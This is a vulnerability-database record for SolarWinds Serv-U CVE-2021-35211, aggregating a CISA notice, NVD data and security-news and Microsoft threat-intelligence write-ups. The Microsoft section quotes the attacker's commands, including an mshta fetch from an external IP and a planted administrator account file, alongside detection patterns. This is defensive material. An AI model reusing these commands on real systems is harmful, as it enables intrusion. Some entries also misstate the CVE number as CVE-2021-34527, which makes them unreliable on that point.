SolarWinds Releases Advisory for Serv-U Vulnerability
2021-07-13T00:00:00
ID CISA:2E658D779271DB98A2BD53EE81F29F3B Type cisa Reporter CISA Modified 2021-07-13T00:00:00
Description
SolarWinds has released an advisory addressing a vulnerability—CVE-2021-35211—affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products.
Microsoft has reported limited and targeted attacks using a 0-day exploit against this vulnerability.
CISA encourages users and administrators to review the SolarWinds advisory and install the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
Please share your thoughts.
We recently updated our anonymous product survey; we'd welcome your feedback.
{"id": "CISA:2E658D779271DB98A2BD53EE81F29F3B", "type": "cisa", "bulletinFamily": "info", "title": "SolarWinds Releases Advisory for Serv-U Vulnerability", "description": "SolarWinds has released an [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) addressing a vulnerability\u2014CVE-2021-35211\u2014affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. \n \nMicrosoft [has reported](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) limited and targeted attacks using a 0-day exploit against this vulnerability.\n\nCISA encourages users and administrators to review the SolarWinds [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) and install the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability>); we'd welcome your feedback.\n", "published": "2021-07-13T00:00:00", "modified": "2021-07-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability", "reporter": "CISA", "references": ["https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211", "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211"], "cvelist": ["CVE-2021-35211"], "immutableFields": [], "lastseen": "2021-07-14T18:10:49", "viewCount": 15, "enchantments": {"dependencies": {"modified": "2021-07-14T18:10:49", "references": [{"idList": ["SERVU_15_2_3_2.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:529C328386588625C56031DEF4AB5D63"], "type": "threatpost"}, {"idList": ["AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917"], "type": "attackerkb"}, {"idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"], "type": "avleonov"}, {"idList": ["CVE-2021-35211"], "type": "cve"}, {"idList": ["THN:8636741FCF3A03B6238D8BAF1D9D00EB", "THN:05251A4D0E47381FEC6EC98D27F46C16"], "type": "thn"}, {"idList": ["RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362"], "type": "rapid7blog"}, {"idList": ["MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2"], "type": "mssecure"}, {"idList": ["MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2"], "type": "mmpc"}], "rev": 2}, "score": {"modified": "2021-07-14T18:10:49", "rev": 2, "value": 5.3, "vector": "NONE"}, "vulnersScore": 5.3}, "wildExploited": true, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "edition": 2, "scheme": null}
{"cve": [{"lastseen": "2021-07-27T07:50:53", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-14T21:15:00", "title": "CVE-2021-35211", "type": "cve", "cwe": ["CWE-668"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-26T15:39:00", "cpe": ["cpe:/a:solarwinds:serv-u:15.2.3"], "id": "CVE-2021-35211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:solarwinds:serv-u:15.2.3:hotfix1:*:*:*:*:*:*", "cpe:2.3:a:solarwinds:serv-u:15.2.3:-:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-27T11:16:43", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 12, 2021 4:00pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\n**wvu-r7** at July 22, 2021 4:35pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-35211", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-35211"], "modified": "2021-07-27T00:00:00", "id": "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "href": "https://attackerkb.com/topics/Toj3cA6kd7/cve-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-12T22:56:36", "bulletinFamily": "info", "cvelist": ["CVE-2021-35211"], "description": "\n\nOn July 12, 2021, SolarWinds confirmed an actively exploited zero-day vulnerability, CVE-2021-35211, in the Serv-U FTP and Managed File Transfer component of SolarWinds15.2.3 HF1 (released May 5, 2021) and all prior versions. Successful exploitation of CVE-2021-35211 could enable an attacker to gain remote code execution on a vulnerable target system. The vulnerability only exists when SSH is enabled in the Serv-U environment.\n\nA [hotfix for the vulnerability is available](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), and **we recommend all customers of SolarWinds Serv-U FTP and Managed File Transfer install this hotfix immediately** (or, at minimum, disable SSH for a temporary mitigation). SolarWinds has emphasized that CVE-2021-35211 only affects Serv-U Managed File Transfer and Serv-U Secure FTP and does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. For further details, see [SolarWinds\u2019s advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n## Details\n\nThe SolarWinds advisory cites threat intelligence provided by Microsoft. According to Microsoft, a single threat actor unrelated to this year\u2019s earlier [SUNBURST intrusions](<https://www.rapid7.com/blog/post/2020/12/14/solarwinds-sunburst-backdoor-supply-chain-attack-what-you-need-to-know/>) has exploited the vulnerability against a limited, targeted population of SolarWinds customers. The vulnerability exists in all versions of Serv-U 15.2.3 HF1 and earlier. Though Microsoft provided a proof-of-concept exploit to SolarWinds, there are no public proofs-of-concept as of July 12, 2021.\n\nThe vulnerability appears to be in the exception handling functionality in a portion of the software related to processing connections on open sockets. Successful exploitation of the vulnerability will cause the Serv-U product to throw an exception, then will overwrite the exception handler with the attacker\u2019s code, causing remote code execution.\n\n## Detection\n\nSince the vulnerability is in the exception handler, looking for exceptions in the `DebugSocketLog.txt` file may help identify exploitation attempts. Note, however, that exceptions can be thrown for many reasons and the presence of an exception in the log does not guarantee that there has been an exploitation attempt.\n\nIP addresses used by the threat actor include:\n \n \n 98.176.196.89 \n 68.235.178.32 \n 208.113.35.58\n \n\nRapid7 does not use SolarWinds Serv-U FTP products anywhere in our environment and is not affected by CVE-2021-35211.\n\nFor further information, see [Solarwinds\u2019s FAQ here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211#FAQ>).", "modified": "2021-07-12T22:39:41", "published": "2021-07-12T22:39:41", "id": "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362", "href": "https://blog.rapid7.com/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/", "type": "rapid7blog", "title": "SolarWinds Serv-U FTP and Managed File Transfer CVE-2021-35211: What You Need to Know", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2021-07-14T04:32:55", "bulletinFamily": "info", "cvelist": ["CVE-2021-35211"], "description": "[](<https://thehackernews.com/images/-xrVxmLD2g1c/YO0JK_DtgnI/AAAAAAAADKE/A8jsKUV1VfoaSivULzYY8fgaTL1LXIzaACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nSolarWinds, the Texas-based company that became the epicenter of a [massive supply chain attack](<https://thehackernews.com/2021/04/researchers-find-additional.html>) late last year, has issued patches to contain a remote code execution flaw in its Serv-U managed file transfer service.\n\nThe fixes, which target Serv-U Managed File Transfer and Serv-U Secure FTP products, arrive after Microsoft notified the IT management and remote monitoring software maker that the flaw was being exploited in the wild. The threat actor behind the exploitation remains unknown as yet, and it isn't clear exactly how the attack was carried out.\n\n[](<https://go.thn.li/1-free-728-8> \"Stack Overflow Teams\" )\n\n\"Microsoft has provided evidence of limited, targeted customer impact, though SolarWinds does not currently have an estimate of how many customers may be directly affected by the vulnerability,\" SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in an advisory published Friday, adding it's \"unaware of the identity of the potentially affected customers.\"\n\nImpacting Serv-U versions 15.2.3 HF1 and before, a successful exploitation of the shortcoming ([CVE-2021-35211](<https://nvd.nist.gov/vuln/detail/CVE-2021-35211>)) could enable an adversary to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\nAs indicators of compromise, the company is urging administrators to watch out for potentially suspicious connections via SSH from the IP addresses 98[.]176.196.89 and 68[.]235.178.32, or via TCP 443 from the IP address 208[.]113.35.58. Disabling SSH access on the Serv-U installation also prevents compromise.\n\nThe issue has been addressed in [Serv-U version 15.2.3 hotfix (HF) 2](<https://customerportal.solarwinds.com/>).\n\n[](<https://go.thn.li/ransomware_300> \"Prevent Ransomware Attacks\" )\n\nSolarWinds also stressed in its advisory that the vulnerability is \"completely unrelated to the SUNBURST supply chain attack\" and that it does not affect other products, notably the Orion Platform, which was exploited to drop malware and dig deeper into the targeted networks by suspected Russian hackers to spy on multiple federal agencies and businesses in one of the most serious security breaches in U.S. history.\n\nA string of [software supply chain attacks](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) since then has highlighted the fragility of modern networks and the sophistication of threat actors to identify hard-to-find vulnerabilities in widely-used software to conduct espionage and drop ransomware, in which hackers shut down the systems of business and demand payment to allow them to regain control.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-07-14T03:18:35", "published": "2021-07-13T03:58:00", "id": "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "href": "https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html", "type": "thn", "title": "A New Critical SolarWinds Zero-Day Vulnerability Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-14T18:33:22", "bulletinFamily": "info", "cvelist": ["CVE-2021-35211"], "description": "[](<https://thehackernews.com/images/-jV4pKLPO7z0/YO5ckCIQNCI/AAAAAAAADLw/TXffCrpewWobX23OGALAYFYzGr4TeTg5gCLcBGAsYHQ/s0/china-hackers.jpg>)\n\nMicrosoft on Tuesday disclosed that the latest string of attacks targeting SolarWinds Serv-U managed file transfer service with a now-patched remote code execution (RCE) exploit is the handiwork of a Chinese threat actor dubbed \"DEV-0322.\"\n\nThe revelation comes days after the Texas-based IT monitoring software maker issued fixes for the flaw that could enable adversaries to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads or view and alter sensitive data.\n\nTracked as [CVE-2021-35211](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>), the RCE flaw resides in Serv-U's implementation of the Secure Shell (SSH) protocol. While it was previously revealed that the attacks were limited in scope, SolarWinds said it's \"unaware of the identity of the potentially affected customers.\"\n\n[](<https://go.thn.li/1-free-300-7> \"Stack Overflow Teams\" )\n\nAttributing the intrusions with high confidence to DEV-0322 (short for \"Development Group 0322\") based on observed victimology, tactics, and procedures, Microsoft Threat Intelligence Center (MSTIC) said the adversary is known for targeting entities in the U.S. Defense Industrial Base Sector and software companies.\n\n[](<https://thehackernews.com/images/-55EFUGOJ584/YO5Y4JTqstI/AAAAAAAADLo/AkprVUi-G1ETMw4yhMrl4J5x66wUvYMcQCLcBGAsYHQ/s0/windows-malware.jpg>)\n\n\"This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,\" [according](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) to MSTIC, which discovered the zero-day after it detected as many as six anomalous malicious processes being spawned from the main Serv-U process, suggesting a compromise.\n\nThe development also marks the second time a China-based hacking group has exploited vulnerabilities in SolarWinds software as a fertile field for targeted attacks against corporate networks.\n\n[](<https://go.thn.li/privileged_728> \"Prevent Data Breaches\" )\n\nBack in December 2020, Microsoft disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. The intrusions have since been attributed to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\nAdditional indicators of compromise associated with the attack can be accessed from SolarWinds' revised advisory [here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n**Update:** This article has been updated to reflect that attackers didn't exploit the SolarWinds flaw to target defense and software companies. As of now, no information has been provided on who was attacked during this zero-day attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-07-14T17:24:08", "published": "2021-07-14T03:41:00", "id": "THN:05251A4D0E47381FEC6EC98D27F46C16", "href": "https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html", "type": "thn", "title": "Chinese Hackers Exploited Latest SolarWinds 0-Day in Targeted Attacks", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2021-07-13T13:05:06", "bulletinFamily": "info", "cvelist": ["CVE-2021-35211"], "description": "SolarWinds has issued a hotfix for a zero-day remote code execution (RCE) vulnerability already under active, yet limited, attack on some of the company\u2019s customers.\n\nMicrosoft alerted the company about the flaw, which affects its [Serv-U Managed File Transfer Server](<https://www.solarwinds.com/serv-u-managed-file-transfer-server>) and [Serv-U Secured FTP](<https://www.solarwinds.com/ftp-server-software>) products. Specifically, the vulnerability exists in the latest Serv-U version 15.2.3 HF1 released on May 5 of this year, as well as all prior versions, the company said in a [security advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) posted over the weekend.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft provided a proof-of-concept (PoC) exploit to SolarWinds, demonstrating how a threat actor who successfully exploits the vulnerability could run arbitrary code with privileges, according to the advisory.\n\n\u201cAn attacker could then install programs; view, change or delete data; or run programs on the affected system,\u201d the computing giant said.\n\nThough the current threat appears to be from a sole actor and \u201cinvolves a limited, targeted set of customers,\u201d SolarWinds wanted to remedy the situation before it could escalate, the company said. \u201cOur joint teams have mobilized to address it quickly,\u201d according to the advisory.\n\nSolarWinds does not currently know many customers may be directly affected by the flaw, nor has it identified the ones who were targeted. The company is recommending that all customers using the affected products update now, which can be done by accessing the company\u2019s [customer portal](<https://customerportal.solarwinds.com/>).\n\n## Unrelated to Supply-Chain Attack\n\nIndeed, SolarWinds likely still has fresh memories of a [global supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) targeting the company\u2019s technology that was discovered late last year and stretched well into 2021. That attack occurred when [a state-sponsored APT](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) injected malicious code into normal software updates for SolarWinds Orion network-management platform.\n\nSpecifically, attackers installed the Sunburst/Solorigate backdoor inside SolarWinds.Orion.Core.BusinessLayer.dll, a SolarWinds digitally signed component of Orion. From there, the threat actors mounted a [massive cyberespionage campaign](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that hit nine U.S. government agencies, Microsoft and other tech companies, as well as about 100 other victims.\n\nSolarWinds stressed in its advisory that the latest vulnerability is not related to that [previous scenario](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) \u2014 which [cost the company $3.5 million](<https://d18rn0p25nwr6d.cloudfront.net/CIK-0001739942/48bd02f7-3c52-4abc-a5e9-60401f9a4e8b.pdf>) in investigation and remediation expenses \u2014 in any way.\n\n\u201cAll other SolarWinds and N-able (formerly SolarWinds MSP) are not affected** **by this vulnerability,\u201d the company wrote. \u201cThis includes the Orion Platform, and all Orion Platform modules.\u201d\n\nIn fact, the company even included a complete list of products \u201cnot known to be affected by this security vulnerability\u201d in the advisory for good measure, perhaps to stave off any potential panic or doubt that news of the latest vulnerability might inspire.\n\nIndeed, one security expert took to Twitter to advise organizations to keep a cool head over the news and take preemptive measures rather than raise an immediate alarm.\n\n\u201cI know there\u2019s a tendency to panic because it\u2019s SolarWinds \u2026 but I\u2019d suggest avoiding panic and taking proactive actions for defense and response instead,\u201d [tweeted](<https://twitter.com/likethecoins/status/1414681417053835265>) Katie Nickels, director of intel at security operations firm Red Canary.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "modified": "2021-07-13T12:58:11", "published": "2021-07-13T12:58:11", "id": "THREATPOST:529C328386588625C56031DEF4AB5D63", "href": "https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/", "type": "threatpost", "title": "SolarWinds Issues Hotfix for Zero-Day Flaw Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2021-07-27T08:39:32", "description": "Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.\n\nThe vulnerability being exploited is CVE-2021-35211, which was [recently patched by SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>). The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U\u2019s implementation of the Secure Shell (SSH) protocol. If Serv-U\u2019s SSH is exposed to the internet, successful exploitation would give attackers ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker\u2019s follow-on malicious actions. [Microsoft Threat Experts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide>) customers who were affected were notified of attacker activity and were aided in responding to the attack.\n\nMicrosoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.\n\n## Who is DEV-0322?\n\nMSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d or \u201cDEV group\u201d and assigns each DEV group a unique number (DEV-####) for tracking purposes.\n\nMSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.\n\n## Attack details\n\nMSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from _Serv-U.exe_ include:\n\n * _C:\\Windows\\System32\\mshta.exe http://144[.]34[.]179[.]162/a_ (defanged)\n * _cmd.exe /c whoami > "./Client/Common/redacted.txt"_\n * _cmd.exe /c dir > ".\\Client\\Common\\redacted.txt"_\n * _cmd.exe /c ""C:\\Windows\\Temp\\Serv-U.bat""_\n * _powershell.exe C:\\Windows\\Temp\\Serv-U.bat_\n * _cmd.exe /c type \\\\\\redacted\\redacted.Archive > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\redacted.Archive"_\n\nWe observed DEV-0322 piping the output of their _cmd.exe_ commands to files in the Serv-U _\\Client\\Common\\ _folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new [global user](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted_ .Archive _file in the _Global Users_ directory. Serv-U user information is stored in these _.Archive _files.\n\nDue to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, _DebugSocketLog.txt_. The process could also crash after a malicious command was run.\n\nBy reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.\n\nTo protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a [targeted attack notification](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide#microsoft-threat-experts---targeted-attack-notification>), which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.\n\n## Detection guidance\n\nCustomers should review the Serv-U _DebugSocketLog.txt_ log file for exception messages like the line below. A _C0000005; CSUSSHSocket::ProcessReceive_ exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.\n\n`EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5`\n\nAdditional signs of potential compromise include:\n\n * Recent creation of_ .txt_ files in the Client\\Common\\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.\n * _Serv-U.exe_ spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for: \n * _mshta.exe_\n * _powershell.exe_\n * cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line: \n * _whoami_\n * _dir_\n * _./Client/Common_\n * _.\\Client\\Common_\n * _type [a file path] > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\\\[file name].Archive"_\n * Any process with any of the following in the command line: \n * _C:\\Windows\\Temp\\_\n * The addition of any unrecognized [global users](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in _C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users_, which appears to store the Global users information.\n\n\n\n### Detection details\n\n#### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Behavior:Win32/ServuSpawnSuspProcess.A\n * Behavior:Win32/ServuSpawnCmdClientCommon.A\n\n#### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:\n\n * Suspicious behavior by Serv-U.exe\n\n#### Azure Sentinel query\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/DEV-0322_SolarWinds_Serv-U_IOC.yaml>).\n\n### Indicators of compromise (IOCs)\n\n * 98[.]176[.]196[.]89\n * 68[.]235[.]178[.]32\n * 208[.]113[.]35[.]58\n * 144[.]34[.]179[.]162\n * 97[.]77[.]97[.]58\n * hxxp://144[.]34[.]179[.]162/a\n * C:\\Windows\\Temp\\Serv-U.bat\n * C:\\Windows\\Temp\\test\\current.dmp\n\nThe post [Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, 